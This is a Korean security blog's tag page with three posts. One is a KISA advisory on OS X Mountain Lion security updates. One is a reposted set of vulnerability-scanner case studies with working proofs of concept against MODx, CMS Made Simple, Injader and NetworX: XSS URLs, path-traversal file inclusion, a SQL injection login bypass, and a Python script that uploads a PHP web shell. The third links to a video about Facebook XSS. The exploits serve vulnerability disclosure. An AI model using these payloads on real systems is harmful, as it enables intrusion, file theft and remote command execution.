'Cross-site Scripting'에 해당되는 글 3건

  1. 2013.09.17 애플, OS X 마운틴라이온 및 보안 업데이트
  2. 2011.11.21 PHP Vulnerability Hunter
  3. 2010.11.09 (동영상) Discovered XSS on Facebook can lead to account hijack
2013.09.17 18:38

애플, OS X 마운틴라이온 및 보안 업데이트

□ 개요
   o 애플社의 Mac 운영체제인 OS X 마운틴라이온에 영향을 주는 다중 취약점을 해결한 보안 업데이트를 발표
   o 공격자는 취약점에 영향 받는 시스템에 서비스 거부 등의 피해를 발생시킬 수 있으므로, 최신버전으로 업데이트 권고

 

□ 설명
   o OS X 마운틴라이온의 Apache에서 발생하는 XSS(Cross-site Scripting) 취약점(CVE-2012-0883, CVE-2012-2687, CVE-2012-3499, CVE-2012-4558)
   o OS X 마운틴라이온의 Bind에서 발생하는 서비스 거부 취약점(CVE-2012-3817, CVE-2012-4244, CVE-2012-5166, CVE-2012-5688, CVE-2012-2266)
   o OS X 마운틴라이온의 루트 인증서 업데이트
   o OS X 마운틴라이온의 ClamAV에서 임의코드 실행으로 이어질 수 있는 다중 취약점(CVE-2013-2020, CVE-2013-2021)
   o OS X 마운틴라이온의 CoreGraphics에서 임의 코드 실행으로 이어질 수 있는 버퍼오버플로우 취약점(CVE-2013-1025)
   o OS X 마운틴라이온의 ImageIO에서 임의 코드 실행으로 이어질 수 있는 버퍼오버플로우  취약점(CVE-2013-1026)
   o OS X 마운틴라이온의 Installer에서 인증서 해지 후에도 관련 패키지를 열 수 있는 다이얼로그 취약점(CVE-2013-1027)
   o OS X 마운틴라이온의 IPSec에서 인증서 확인 과정에서 발생하는 취약점(CVE-2013-1028)
   o OS X 마운틴라이온의 Kernel에서 발생하는 서비스 거부 취약점(CVE-2013-1029)
   o OS X 마운틴라이온의 Mobile Device Management에서 파이프를 통한 통신 중 발생하는   취약점(CVE-2013-1030)
   o OS X 마운틴라이온의 OpenSSL에서 발생하는 다중 취약점(CVE-2012-2686, CVE-2013-0166, CVE-2013-0169)
   o OS X 마운틴라이온의 PHP에서 임의 코드 실행으로 이어질 수 있는 다중 취약점(CVE-2013-1635, CVE-2013-1643, CVE-2013-1824, CVE-2013-2110)
   o OS X 마운틴라이온의 PostgreSQL에서 데이터 손상을 가져올 수 있는 다중 취약점(CVE-2013-1899, CVE-2013-1900, CVE-2013-1901)
   o OS X 마운틴라이온의 Power Management에서 전원 설정 잠금 문제에서 발생하는 취약점(CVE-2013-1031)
   o OS X 마운틴라이온의 QuickTime에서 메모리 손상으로 이어질 수 있는 취약점(CVE-2013-1032)
   o OS X 마운틴라이온의 Screen Lock에서 세션의 화면 잠금 처리에서 발생하는 취약점(CVE-2013-1033)
   o OS X 마운틴라이온의 sudo에서 잘못된 타임스탬프 체크에서 발생하는 취약점(CVE-2013-1775)

 

□ 해당 시스템
   o 영향 받는 소프트웨어
    - Mac OS X v10.6.8
    - Mac OS X 서버 v10.6.8
    - OS X 라이온 v10.7.5
    - OS X 라이온 서버 v.10.7.5
    - OS X 마운틴라이온 v10.8 ~ v.10.8.4


□ 해결 방안
   o OS X 마운틴라이온 10.8.5 버전 및 보안(2013-004) 업데이트(업데이트 공지 이용)
    ① 업데이트 공지가 뜰 경우, [업데이트]를 선택하여 소프트웨어 업데이트 진행

   o OS X 마운틴라이온 10.8.5 버전 및 보안(2013-004) 업데이트(홈페이지에서 직접 설치)
    ① http://support.apple.com/downloads/ 링크에서 해당 버전을 다운로드하여 업데이트 진행

   o OS X 마운틴라이온 10.8.5 버전 및 보안(2013-004) 업데이트(맥 앱스토어 이용)
    ① 애플 메뉴에서 [소프트웨어 업데이트] 선택

   ② 맥 앱스토어에서 해당 소프트웨어의 [업데이트]를 선택하여 업데이트 진행

 

□ 용어 정리
   o OS X 마운틴라이온 : 애플에서 개발한 모바일 제품과 맥을 통합시킨 운영체제

 

□ 기타 문의사항
   o 한국인터넷진흥원 인터넷침해대응센터: 국번없이 118

 

[참고사이트]
[1] http://support.apple.com/kb/HT5880


Trackback 0 Comment 0
2011.11.21 20:48

PHP Vulnerability Hunter

All testing was performed on Windows XP and Vista using XAMPP. Each target application was installed, then a full scan was performed. Noteworthy log entries revealing exploitable faults are shown followed by the expoit proof of concepts and resulting advisories.

Case Study 1: MODx Revolution 2.0.2-pl

Reflected Cross-site Scripting Log Entry

Alert Name: Reflected XSS
GET /modx/manager/index.php?service=12%3cscript%3ealert(0)%3c%2fscript%3e&login_context=12%3cscript%3ealert(0)%3c%2fscript%3e&q=12%3cscript%3ealert(0)%3c%2fscript%3e&cultureKey=12%3cscript%3ealert(0)%3c%2fscript%3e&modahsh=12%3cscript%3ealert(0)%3c%2fscript%3e&installGoingOn=12%3cscript%3ealert(0)%3c%2fscript%3e HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3


HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 13:54:18 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Set-Cookie: PHPSESSID=653ch30lgkjk9bo8b7gu13u8u4; expires=Thu, 27-Jan-2011 13:54:18 GMT; path=/modx/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Thu, 20 Jan 2011 13:54:18 GMT
Cache-Control: post-check=0, pre-check=0
Content-Length: 6946
Content-Type: text/html; charset=UTF-8

[Response Trimmed]
<form id="modx-login-form" action="" method="post">
<input type="hidden" name="login_context" value="mgr" />
<input type="hidden" name="modahsh" value="12<script>alert(0)</script>" />
[Response Trimmed]

Reflected Cross-site Scripting Proof of Concept

http://localhost/modx/manager/index.php?modahsh=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
Original Advisory

Local File Inclusion Log Entry

Alert Name: Local File Inclusion
POST /modx/manager/controllers/default/resource/tvs.php?class_key=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&resource=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00 HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3


HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 04:21:29 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Content-Length: 11
Content-Type: text/html

LFI_Test123

Local File Inclusion Proof of Concept

http://localhost/modx/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00
Original Advisory 


Case Study 2: CMS Made Simple 1.8

Local File Inclusion Log Entry

Alert Name: Local File Inclusion
POST /cmsms/admin/addbookmark.php HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 192
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

------x
Content-Disposition: form-data; name="default_cms_lang"

../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../lfi_test.txt 
------x--


HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 05:00:36 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Set-Cookie: CMSSESSID839fe7b5=uk0uvk8aja6cfajgluik3sbok3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: sp_=883fc4fd
Content-Length: 322
Content-Type: text/html

LFI_Test123<script type="text/javascript">
<!--
    location.replace("http://localhost/cmsms/admin/login.php");
// -->
</script>
<noscript>
    <meta http-equiv="Refresh" content="0;URL=http://localhost/cmsms/admin/login.php">
</noscript>

Local File Inclusion Proof of Concept

import httplib, urllib

host = 'localhost'
path = '/cmsms'

lfi = '../' * 32 + 'windows/win.ini\x00'

c = httplib.HTTPConnection(host)
c.request('POST', path + '/admin/addbookmark.php',
urllib.urlencode({ 'default_cms_lang': lfi }),
{ 'Content-type': 'application/x-www-form-urlencoded' })
r = c.getresponse()

print r.status, r.reason
print r.read()
Original Advisory 


Case Study 3: Injader 2.4.4

SQL Injection Log Entry

Alert Name: Potential SQL Injection
POST /injader/login.php?un='%3b--%22%3b--&pw='%3b--%22%3b-- HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3


HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 02:30:15 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Content-Length: 794
Content-Type: text/html

<br />
<b>Deprecated</b>:  Function split() is deprecated in <b>C:\tools\xampp\htdocs\injader\sys\includes\ifw\IQuery.php</b> on line <b>143</b><br />
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" 
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>
<title>Database Error</title>
<link rel="stylesheet" type="text/css" href="/injader/sys/loginpage.css" />
</head>
<body>
<div id="mPage">
<h1>Database Error</h1>
<p>Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\'' at line 1. </p>

<p>Your query was: SELECT username, id FROM maj_users WHERE username = '\'</p>
<p id="err-src"><strong>Source:</strong> User::ValidateLogin; Line: 179</p>
</div>
</body>
</html>

SQL Inection Proof of Concept

http://localhost/injader/login.php?un=\\'%20or%20id=1%20and%20'a'='a&pw=\\'%20or%20'a'='a
Original Advisory 


Case Study 4: NetworX 1.0.3

Arbitrary Upload Log Entry

Alert Name: Arbitrary File Event - Type=Changed Path=C:\tools\xampp\htdocs\networx\tmp\shell.php
POST /networx/about.php HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 195
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

------x
Content-Disposition: form-data; name="shell_file"; filename="shell.php"
Content-Type: application/octet-stream

<?php echo '<pre>' + system($_GET['CMD']) + '</pre>'; ?>
------x--


HTTP/1.1 200 OK
Date: Sun, 23 Jan 2011 23:34:40 GMT
[Trimmed]

Shell Upload Proof of Concept

import sys, socket
host = 'localhost'
path = '/networx'
port = 80

def upload_shell():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)    

s.send('POST ' + path + '/upload.php?logout=shell.php HTTP/1.1\r\n'
'Host: ' + host + '\r\n'
'Proxy-Connection: keep-alive\r\n'
'User-Agent: x\r\n'
'Content-Length: 193\r\n'
'Cache-Control: max-age=0\r\n'
'Origin: null\r\n'
'Content-Type: multipart/form-data; boundary=----x\r\n'
'Accept: text/html\r\n'
'Accept-Encoding: gzip,deflate,sdch\r\n'
'Accept-Language: en-US,en;q=0.8\r\n'
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n\r\n'
'------x\r\n'
'Content-Disposition: form-data; name="Filedata"; filename="shell.php"\r\n'
'Content-Type: application/octet-stream\r\n\r\n'
'<?php echo "<pre>" + system($_GET["CMD"]) + "</pre>"; ?>\r\n'
'------x--\r\n\r\n')

resp = s.recv(8192)

http_ok = 'HTTP/1.1 200 OK'

if http_ok not in resp[:len(http_ok)]:
print 'error uploading shell'
return
else: print 'shell uploaded'

shell_path = path + '/tmp/shell.php'

s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
'Host: ' + host + '\r\n\r\n')

if http_ok not in s.recv(8192)[:len(http_ok)]: print 'shell not found'        
else: print 'shell located at http://' + host + shell_path

upload_shell()
Original Advisory

Reflected Cross-site Scripting Log Entry

Alert Name: Reflected XSS
GET /networx/group_connections_list_popup.php?logout=181%3cscript%3ealert(0)%3c%2fscript%3e&group_id=181%3cscript%3ealert(0)%3c%2fscript%3e HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3


HTTP/1.1 200 OK
Date: Sun, 23 Jan 2011 23:38:22 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Set-Cookie: PHPSESSID=jl5bal27shg6e9akhu5566lqu7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2107
Content-Type: text/html

[Trimmed]
<input type="hidden" name="GroupID" value="181<script>alert(0)</script>" />
<input type="image" src="images/btn-send_invitations.gif" alt="Send Invitations" />
[Trimmed]

Reflected Cross-site Scripting Proof of Concept

http://localhost/networx/group_connections_list_popup.php?group_id=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
Original Advisory


출처 : autosectools.com

Trackback 1 Comment 0
2010.11.09 15:04

(동영상) Discovered XSS on Facebook can lead to account hijack



출처 : http://www.acunetix.com/

Trackback 0 Comment 0